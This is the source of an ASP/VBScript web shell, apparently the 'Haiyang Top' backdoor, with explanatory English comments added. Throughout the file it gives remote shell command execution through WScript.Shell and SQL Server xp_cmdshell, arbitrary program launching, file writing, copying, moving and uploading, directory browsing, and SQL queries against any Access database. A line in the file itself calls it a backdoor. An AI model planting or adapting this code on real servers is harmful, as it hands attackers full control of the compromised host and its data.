<!--
' 進入網頁運行的子程序
' Client-side handler (IE/VBScript only) that runs when the page has loaded.
' Prompts for a user name with InputBox, copies the answer into the UserName
' field of form USER and submits the form. Nothing here is authentication:
' the value is whatever the visitor types, no check is made on the client,
' and the server-side code that receives the submit is outside this view.
Sub Window_OnLoad
Dim strUserName
' Show the name prompt (dialog positioned at 300,200)
strUserName=InputBox("請輸入用戶名進入站點", "輸入用戶名", "", 300, 200)
' Copy the answer into the form field
USER.UserName.Value = strUserName
USER.Submit ' submit the form
End Sub
-->
</SCRIPT>
<%Else%>
<center>歡迎用戶[<%=strUserName %>]進入站點
</center>
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder">
<tr><td>
<table border=0 width=100% cellspacing=1 cellpadding=0 class="noborder" >
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td width="59%" align=left> 服務器名</td>
<td width="41%" bgcolor="#EEEEEE"> <%=Request.ServerVariables("SERVER_NAME")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器IP</td>
<td> <%=Request.ServerVariables("LOCAL_ADDR")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器端口</td>
<td> <%=Request.ServerVariables("SERVER_PORT")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器時間</td>
<td> <%=now%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 本文件絕對路徑</td>
<td> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器CPU數量</td>
<td> <%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%> 個</td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td align=left> 服務器操作系統</td>
<td> <%=Request.ServerVariables("OS")%></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left> 客戶端IP: 端口 [代理]</td><td> <%=Request.ServerVariables("REMOTE_ADDR")%>|
<%=Request.ServerVariables("REMOTE_PORT")%>
[<%=Request.ServerVariables("HTTP_X_FORWARDED_FOR")%>]</td></tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><%
' Crude server speed probe: time 500000 iterations of a trivial assignment.
' `i` is never declared (no Option Explicit in view) and `lsabc` is only written.
' Timer returns seconds, so (t2-t1)*10000 is tenths of a millisecond; that is
' rounded to an integer and divided by 10 to give milliseconds with one decimal,
' formatted as a string for the red "毫秒" cell below.
dim t1,t2,lsabc,thetime
t1=timer
for i=1 to 500000
lsabc= 1 + 1
next
t2=timer
' round((t2-t1) seconds to 0.1 ms), then express in ms
thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)
%><td align=left> 服務器運算速度測試</td>
<td> <font color=red><%=thetime%> 毫秒</font></td>
</tr>
</table><center><br>
<%
pathlcx=trim(Request.form("pathlcx")) ' target file path (used unescaped below)
textlcx=trim(Request.form("textlcx")) ' single-line file content
' Arbitrary file write implemented as command execution: the content is echoed
' into the target path by cmd.exe, which is launched through a Shell.Application
' shortcut rather than WScript.Shell. The Replace calls prefix the cmd.exe
' metacharacters > < & " CR LF with "^" so textlcx survives the echo; pathlcx
' gets no escaping at all. Everything runs as the IIS worker identity.
if textlcx<>"" and pathlcx<>"" then
textlcx=replace(textlcx,">","^>")
textlcx=replace(textlcx,"<","^<")
textlcx=replace(textlcx,"&","^&")
textlcx=replace(textlcx,chr(34),"^"&chr(34))
textlcx=replace(textlcx,chr(10),"^"&chr(10))
textlcx=replace(textlcx,chr(13),"^"&chr(13))
set shell=server.createobject("shell.application")
' Load an existing Notepad shortcut from a hard-coded Start Menu path (the folder
' names are Chinese-locale Windows names; other layouts will presumably fail
' here), retarget it to cmd.exe and save it as c:\a.lnk.
set shellfolder=shell.namespace("C:\Documents and Settings\Default User\「開始」菜單\程序\附件")
set shellfolderitem=shellfolder.parsename("記事本.lnk")
set objshelllink =shellfolderitem.getlink
objshelllink.path="cmd.exe"
' The command writes the file, then deletes the shortcut it was started from.
objshelllink.arguments="/c echo "&textlcx&">"&pathlcx&" &&del c:\a.lnk"
objshelllink.save("c:\a.lnk")
' Default verb on the shortcut = run it, i.e. start cmd.exe with the arguments above.
shell.namespace("c:\").items.item("a.lnk").invokeverb
end if
%>
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder"><tr bgcolor="#EEEEEE" height=18 class="noborder" style='table-layout:fixed; word-break:break-all'><td align=left>
<form action="<%= Request.ServerVariables("URL") %>" method="post">
<input type=text name=text value="<%=DSnXA %>"> <font class=fonts>輸入要瀏覽的目錄,最后要加\</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text1 value="<%=DSnXA1 %>">
copy
<input type=text name=text2 value="<%=DSnXA2 %>"> <font class=fonts>目的地址不要帶文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<input type=text name=text3 value="<%=DSnXA3 %>">
move
<input type=text name=text4 value="<%=DSnXA4 %>"><font class=fonts> 目的地址不要帶文件名</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
路徑:<input type=text name=text5 value="<%=DSnXA5 %>" >
程序:<input type=text name=text6 value="<%=DSnXA6 %>" ><font class=fonts> 不可以加參數</font></td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type="text" name="ok" size=55><font class=fonts> CMD命令對話框</font>
</td></tr><tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left><input type=text name=pathlcx size=55><font class=fonts> 路徑與文件名</font></td><tr/>
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td align=left>
<textarea cols=80 rows=5 name=textlcx >
要生成的文件內容,不可以有回車:<% ok=Request("ok")
' Command execution: `ok` (read through the unqualified Request collection, so
' query string, form or cookie can supply it) is appended to "cmd.exe /c " and
' run with WScript.Shell.Exec; no empty check, no escaping. Stdout is written
' raw into this <textarea>, so the output is not HTML-encoded and a literal
' </textarea> in it would break out of the element.
response.write server.createobject ("wscript.shell").exec ("cmd.exe /c "& ok).stdout.readall
%></textarea>
<input type=submit name=sb value=發送命令 class=input>
</form></td></tr>
<script language=vbs>
' Show the value of form8.text1 in decimal and hexadecimal via two alerts.
' Numeric input is shown as typed and as Hex(); any other input is reduced to
' the ASCII code of its first character (Asc only looks at the first char).
sub main()
Dim src, dec, hx
src=form8.text1.value
If Not IsNumeric(src) Then
' non-numeric: first character's code point, then its hex form
dec=asc(cstr(src))
hx=hex(dec)
alert("10進制為"&dec)
alert("16進制為"&hx)
exit sub
end if
' numeric: Hex() converts the string itself
hx=hex(cstr(src))
alert("10進制為"&src)
alert("16進制為"&hx)
end sub
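' Convert the hexadecimal string in form8.vars to decimal and show it together
' with its Chr() value. Digits 0-9 and letters a-f/A-F are accepted; any other
' character aborts with an alert. Each character contributes
' digit * 16^(distance from the right end).
' Fix: the rejection message said hex digits are "1~9"; they are 0~9. The
' numeric branch now uses the same 16^(nums_len-i) weight as the letter branch
' (the old tmp*16*16^(nums_len-i-1) is the same value written awkwardly).
sub main2()
If form8.vars.value <>"" Then
Dim nums,tmp,tmpstr,i,nums_len
nums=form8.vars.value ' hex string typed by the user
nums_len=Len(nums)
tmpstr=0
For i=1 To nums_len
tmp=Mid(nums,i,1) ' current character
If IsNumeric(tmp) Then
' decimal digit: weight 16^(nums_len-i)
tmp=tmp * (16^(nums_len-i))
Else
' only A-F (after upper-casing) are valid hex letters
If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then
alert("你輸入的數值中有非法字符,16進制數只包括0~9及a~f之間的字符,請重新輸入。")
exit sub
End If
' "A" is 65, so value = code-55; same weight as a digit
tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))
End If
' accumulate the positional value
tmpstr=tmpstr+tmp
Next
' Chr() raises a runtime error for values outside its range (e.g. very long input)
alert("轉換的10進制為:"&tmpstr&"其字符值為:"&chr(tmpstr))
End If
end sub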
</script>
<form name=form8 method="post">
<input type=text name=text1 value=字符和數字轉10和16進制 size=30><input type=submit onclick=main() value="給我轉">
<input type="text" name="vars" value=16進制轉10進制和字符 size=30><input type=submit onclick=main2() value="給我轉">
</form>
</table>
</center>
<%
' Ad-hoc Access query runner. Both inputs come from the query string:
'   mdb — path of an .mdb file, resolved with Server.MapPath (whatever file the
'         worker identity can read under the mapped location; no whitelist)
'   SQL — executed verbatim, no parameterisation
' Only a statement beginning with lowercase "select" (binary string compare, so
' "SELECT" does not match) reaches Execute; everything else falls through to
' the alert at the bottom and nothing in this view executes it.
Dim strSQL, objDBConn, objRS, intFieldCount, intCounter,mdb
mdb = Request.QueryString("mdb")
strSQL = Request.QueryString("SQL")
If strSQL <> "" and left(trim(strsql),6)="select" Then
' The statement is reflected into the page unescaped
Response.Write "SQL字符串: " & strSQL & "<br>"
' Create the database connection object
Set objDBConn = Server.CreateObject("ADODB.Connection")
' Open the caller-chosen database (original note: replace mdb with your database name)
objDBConn.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath(mdb)
' Run the query
Set objRS = objDBconn.Execute(strSQL)
' Zero-based upper bound of the field index
intFieldCount = objRS.Fields.Count - 1
' Any rows?
If Not objRS.Eof Then
Response.Write "<table border=1><tr>"
' Header row: field names
For intCounter = 0 to intFieldCount
Response.Write "<td><b>" & objRS(intCounter).Name & "</b></td>"
Next
Response.Write "</tr>"
' Data rows; cell values are written raw (no HTML encoding), empty ones as "---"
Do While Not objRS.Eof
Response.Write "<tr>"
For intCounter = 0 to intFieldCount
If objRS.Fields(intCounter).Value <> "" Then
Response.Write "<td valign=""top"">" & objRS.Fields(intCounter).Value & "</td>"
Else
Response.Write "<td valign=""top"">---</td>"
End If
Next
Response.Write "</tr>"
objRS.MoveNext ' next record
Loop
Response.Write "</table>"
Else
Response.Write "<b>沒有符合條件的記錄</b><br>"
End If
' Cleanup only runs on the success path: there is no On Error handling, so an
' error in Open/Execute ends the page with the connection still open.
objRS.Close ' close the recordset
Set objRS = Nothing
objDBConn.Close ' close the connection
Set objDBConn = Nothing
end if
if strSQL <> "" and left(trim(strsql),6)<>"select" Then
%>
<script>javascript:alert("這不是select命令\n請打開數據庫看運行結果\n海陽頂端網lcx\n這個你可以當做一個access版sql后門:-)")</script>
<%
' The alert text tells the user to check the database for the result, but no
' Execute call for a non-select statement exists anywhere in this view.
end if
%>
<form action="<%=url%>" method="GET">
<table border=0 width=500 cellspacing=0 cellpadding=0 class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td>SQL字符串:</td>
<td><Input TYPE="TEXT" NAME="SQL" value="<%=strSQL%>" size ="30">
<Input TYPE="TEXT" NAME="mdb" value="acess數據庫相對目錄及名稱" size ="30"></td>
</tr>
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td colspan=2 align=center><input TYPE="SUBMIT" value="查詢數據庫,或執行其它sql語句"></td>
</tr>
</table>
</form>
<% If trim(request.form("cmd"))<>"" Then %>
<%
' Command execution through SQL Server: logs in with the posted credentials and
' runs the posted command via master.dbo.xp_cmdshell, collecting column 0 of
' every result row into strResult. Notes:
'  - the connection string is concatenated from `pa`/`id` with no quoting, so a
'    ";" in either value injects further connection properties; no Data Source
'    is given, so the provider's default server is presumably used;
'  - `cmd` is embedded in a single-quoted T-SQL literal without doubling
'    apostrophes, so a "'" in the command breaks or rewrites the statement;
'  - xp_cmdshell runs the command under the SQL Server service context, not the
'    IIS worker identity.
password= trim(Request.form("pa"))
id=trim(Request.form("id"))
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id
strQuery = "exec master.dbo.xp_cmdshell '" & request.form("cmd") & "'"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
' As rendered here the next three Replace calls substitute each string with
' itself and do nothing; they were presumably &nbsp;/&lt;/&gt; entities that
' got decoded when this listing was published. Either way, the value written to
' the page later is not HTML-escaped.
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"<br>")
End if
' Released without Close; the connection is dropped only when the object is freed.
set adoConn = Nothing
%> <br><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<form name="form" method=post action="<%=Request.ServerVariables("URL")%>">
<input type="text" name="cmd" size=25 >
<input type="text" name="id" size=10 value="mssql用戶名">
<input type="text" name="pa" size=10 value="mssql密碼">
<input type="submit" value="執行cmd命令">
</form></tr></table><br><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder"><td>
<form name="form1" method="post" action="<%=url%>?up=1" enctype="multipart/form-data" >
傳至服務器已有目錄:
<input name="filepath" type="text" value="drv:\path" size="15">
文件地址:
<input type="file" name="file1" value="" size=1>
<input type="submit" name="Submit" value="上傳" > 〖絕對路徑〗
</td></Tr>
</form></table>
<%
' Echo the submitted command and the xp_cmdshell output. Both go to the page
' unescaped: request.form("cmd") is reflected as-is, and strResult was only
' passed through Replace calls that (as rendered here) do not encode HTML.
' strResult is Empty when no cmd was posted — it is assigned only inside the
' If block above.
Response.Write request.form("cmd") & "<br><br>"
Response.Write strResult
%>
</center>
<%
DSnXA = Request.Form("text") ' folder to list (posted from the "text" input)
' Directory listing via Shell.Application: prints "<path>-----<size>" for every
' item of the posted folder. No path restriction — any folder the worker
' identity can open. Namespace() returns Nothing for a path it cannot open, so
' `.items` then raises a runtime error. The form input that posts this value is
' rendered earlier in the page than this assignment, so its value attribute
' comes back empty unless DSnXA is set somewhere before this view starts.
if (DSnXA <> "") then
set shell=server.createobject("shell.application") ' create the shell object
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
for each co in foditems
response.write "<font color=black>" & co.path & "-----" & co.size & "</font><br>"
next
end if
%>
<%
DSnXA1 = Request.Form("text1") ' source (original note: folder copy, not file copy)
DSnXA2 = Request.Form("text2") ' destination folder
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") ' create the shell object
set fod1=shell1.namespace(DSnXA2)
' Split the source into parent folder and leaf name at the last backslash.
' With no backslash at all, `path` stays Empty and `i` finishes at 0, so the
' leaf is the whole string and Namespace(Empty) below most likely fails.
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="\" then
path=left(DSnXA1,i-1)
exit for
end if
next
' A two-character parent (a bare drive such as C:) needs its trailing backslash
if len(path)=2 then path=path & "\"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
' CopyHere is documented as asynchronous and may show shell UI on the server;
' the message below is printed unconditionally, not on confirmed completion.
' fod1/path/path2/i are page-level names reused by the move block that follows.
fod1.copyhere foditem
response.write "command completed success!"
end if
%>
<%
DSnXA3 = Request.Form("text3") ' source to move
DSnXA4 = Request.Form("text4") ' destination folder
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") ' create the shell object
set fod1=shell2.namespace(DSnXA4)
' Same parent/leaf split as the copy block: scan back to the last backslash.
' With no backslash, `path` keeps whatever the copy block left in it (or Empty)
' and `i` finishes at 0, so the leaf is the whole string.
for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="\" then
path=left(DSnXA3,i-1)
exit for
end if
next
' A two-character parent (a bare drive such as C:) needs its trailing backslash
if len(path)=2 then path=path & "\"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
' MoveHere is documented as asynchronous; the success message is unconditional.
fod1.movehere foditem
response.write "command completed success!"
end if
%>
<%
DSnXA5 = Request.Form("text5") ' folder that contains the program
DSnXA6 = Request.Form("text6") ' program file name (the form says: no arguments)
' Launches the item with its default shell verb (InvokeVerb with no argument),
' i.e. "open" — arbitrary program execution as the worker identity, in the
' server's session. Nothing is validated; the success message is unconditional
' and Namespace()/item() returning Nothing raises a runtime error instead.
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") ' create the shell object
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
%>
<center><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<td colspan=2 align=center><form method="POST" action=""&url&"">
Enter Password:<input type="password" name="password" size="20">
<input type="submit" value="LOGIN"></td>
</tr>
</form></td></tr></table>
</center>
</body>
<%End If%>
<%end sub%>
<%sub main()
'修改下面的urlpath改為你服務器的實際URL
urlpath=Request.ServerVariables("SERVER_NAME")
dim cpath,lpath
set fsoBrowse=CreateObject("Scripting.FileSystemObject")
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
%><html>
<script language="JavaScript">
// Opens a new window that asks this page (id=edit&creat=yes) to create a file
// named `ls` under the current listing path. The server values (<%=url%>,
// attrib, lpath) are interpolated into the JS string literal unescaped and `ls`
// is appended without encodeURIComponent; the handling branch is outside this view.
function crfile(ls)
{if (ls==""){alert("請輸入文件名!");}
else {window.open("<%=url%>?id=edit&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
// Same as crfile, but asks for a folder (id=dir&op=creat) named `ls` under the
// current listing path. The empty-name alert reuses the "file name" wording.
// Server values are interpolated unescaped and `ls` is appended raw.
function crdir(ls)
{if (ls==""){alert("請輸入文件名!");}
else {window.open("<%=url%>?id=dir&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
' After a confirm(), opens a new window asking the page (id=dir&op=del) to delete
' the folder `ls`. `ls` goes into the query string raw. This one uses the
' server-side <%=url%>; copyfile below uses a client-side `url` instead.
sub rmdir(ls)
if confirm("你真的要刪除這個目錄嗎!"&Chr(13)&Chr(10)&"目錄為:"&ls) then
window.open("<%=url%>?id=dir&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
' Prompts for a destination and opens a new window asking the page
' (id=edit&op=copy) to copy `sfile` there. Destination rules: a value containing
' ":" or starting with "/" counts as absolute (the `Or` relies on a nonzero
' InStr position being truthy); absolute paths are refused unless attrib="true"
' (absolute-path mode), otherwise the current listing path is prefixed.
' `url` here is a client-side name not defined in this view, so it presumably
' evaluates to Empty and the window opens a relative "?id=edit&..." URL.
sub copyfile(sfile)
dfile=InputBox(""&Chr(13)&Chr(10)&"源文件:"&sfile&Chr(13)&Chr(10)&"請輸入目標文件的文件名:"&Chr(13)&Chr(10)&"許帶路徑,要根據你的當前路徑模式. 注意:絕對路徑示例c:/或c:\都可以")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
' absolute destination: no prefix, allowed only in absolute-path mode
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "對不起,你在相對路徑模式下不能使用絕對路徑"&Chr(13)&Chr(10)&"錯誤路徑:["&dfile&"]"
exit sub
end if
else
' relative destination: prefix the current listing path
lp="<%=lpath%>"
end if
window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您沒有輸入文件名!"
end If
end sub
</script><body bgcolor="#F5F5F5">
<TABLE cellSpacing=1 cellPadding=3 width="750" align=center
bgColor=#b8b8b8 border=0 class="noborder">
<TBODY>
<TR >
<TD
height=22 colspan="4" bgcolor="#EEEEEE" >切換盤符:
<%